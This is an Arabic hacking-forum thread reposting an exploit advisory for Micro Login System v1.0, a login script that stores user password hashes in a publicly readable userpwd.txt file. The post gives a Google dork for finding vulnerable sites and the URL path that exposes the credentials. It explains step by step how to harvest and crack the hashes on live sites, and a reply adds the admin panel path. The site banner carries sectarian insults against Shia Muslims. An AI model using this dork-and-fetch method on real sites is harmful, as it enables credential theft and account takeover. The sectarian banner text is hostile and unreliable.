عالم المعرفة       - Group XP -       أهل السنه والجماعه

فضائح الخميني ، فضائح الشيرازي ، فضائح الخوئي ، فضائح السيستاني ، فضائح حسن نصر الله ، فضائح مقتدى الصدر ، فضائح المذهب الشيعي ، فضائح الشيعة ، فضائح الرافضة ، فضائح الروافض , افلام , وصور , جرائم المجوس ضدأهل السنه , ومقالات , وتصريحات إعلامية

تعــــلم تشفير الباتش تشفير السيرفر فك التشفير تشفير الملفات Crypter الحوار السني الشيعي ضع إعلانك هنا ضع إعلانك هنا

حالة التسجيل "مغلق


 
العودة   عالم المعرفة - Group XP - أهل السنه والجماعه > قسم حماية الاجهزة والسيرفرات > مكتبة الثغرات

مكتبة الثغرات ثغرات المواقع , ثغرات المنتديات ثغرات الأنظمة ثغرات مجلات , ثغرات البرامج و كيفية الاستغلال ,windows, linux, freebsd, DDOS Attacks,DNS hijacking , Kernel, Local, buffer, overflow, auditing, spoofing, sniffer, sniffing, vulnerability, exploit

إضافة رد
 
أدوات الموضوع
قديم 05-29-2012, 05:31 AM   رقم المشاركة : 1
عبادي عرعر
عضو جديد
 
الصورة الرمزية عبادي عرعر






عبادي عرعر غير متصل

عبادي عرعر will become famous soon enoughعبادي عرعر will become famous soon enough

Wink Micro Login System v 1.0 Read password

Add Group XP

آلسلآم عليكم ورحمة آلله وبركآته،،

كيفكم آخوآني الكرام ..

صبحككم الله بالخير يا وجيه الخير ،

المهم اليوم معآي ثغره حلوه،


اقتباس:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [***33976; Site : 1337day.com 0
1 [***33976; Support e-mail : submit[@]1337day.com 1
0 0
1 +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ 1
0 |I'm DoSs-Dz Member From Inj3ct0r Team | 1
1 +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
+---------------------------------------------------------------------------------------------------+
|-> Author: DoSs-Dz |
|-> Exploit Title : Micro Login System v 1.0 Read password |
|-> Vendor Site : [عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا] |
|-> version : v1.0 |
|-> Date : 18/05/12 |
|-> Google Dork : intext:"Micro Login System v 1.0" |
+---------------------------------------------------------------------------------------------------+
1) Vuln in common.php in line 26 -> 30 :

Check user existance
$pfile = fopen("userpwd.txt","a+"); <----- Creat passwd fichier
rewind($pfile);

If everything is OK -> store user data
if ($errorText == ''){
// Secure password string
$userpass = md5($pass1); <--- Hhhh Md5

fwrite($pfile, "\r\n$user:$userpass"); <------ now you can see user and pass(md5) in userpwd.txt

}

2) P0c :
http://127.0.0.1/{path}/userpwd.txt (now you can see your user and pass )

3) Live Demo :
[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]
[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]
[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]
[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]

+---------------------------------------------------------------------------------------------------+
|-> Spec!&l 10x 2 : Black-ID - Damane2011 - Robert Miles - BaC-Dz - Tn_Sploiter |
|-> Great'z : Sec4ever - is-sec.org - v4-team - vbspiders - all arab hack or security forum |
|-> exploit-db.com - exploit4arab.com - 1337day.com |
+---------------------------------------------------------------------------------------------------+
رآبط الثغره

[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]

شرح الثغره ،

نضع الدوركت بقوقل ،

intext:"Micro Login System v 1.0"


userpwd.txt حط هادا بعد مسار الموقع
بيطلعلك اليزر والباسوورد
اغلبا بكون مشفر فيه طرق كثيره لفك تشفيره


وبالثغره حاطط مواقع تطبيق عليها
[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]
[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]
[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]
[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]

آن شاء الله انكم طلعتم بفايده


من يدعي لي دعوه توفيق وهدايه
وتيسير امور ولكم مثلها يا اخواني
بسم الله ماشاء الله تبارك الله
اللهم اني بريء اللهم اني بريء،



لآتنسوون التقيم،






التوقيع

[عزيزي الزائر يتوجب عليك التسجيل للمشاهدة الرابطللتسجيل اضغط هنا]
سبحانك اللهم وبحمد اشهد ان لا اله الا انت نستغفرك ونتوب اليك
[email protected]
  رد مع اقتباس
قديم 05-31-2012, 02:02 PM   رقم المشاركة : 2
زكريا الاغا
عضو جديد






زكريا الاغا غير متصل

زكريا الاغا will become famous soon enoughزكريا الاغا will become famous soon enough

افتراضي رد: Micro Login System v 1.0 Read password

Add Group XP

ومسار لوحة التحكم عليك تضيف login.php







  رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
login, micro, password, read, system


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Private Key On Server & Login without password DB-Attack أمن المواقع والسيرفرات 16 03-28-2014 07:34 AM
FaceBook&Twitter Bruto Force python Hack.VB.NeT منتدى أدوات وبرامج الإختراق 5 10-20-2013 03:32 PM


الساعة الآن 09:32 AM.


روابط مهمة

أقسام المنتدى



Powered by vBulletin Version 3.8.7
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة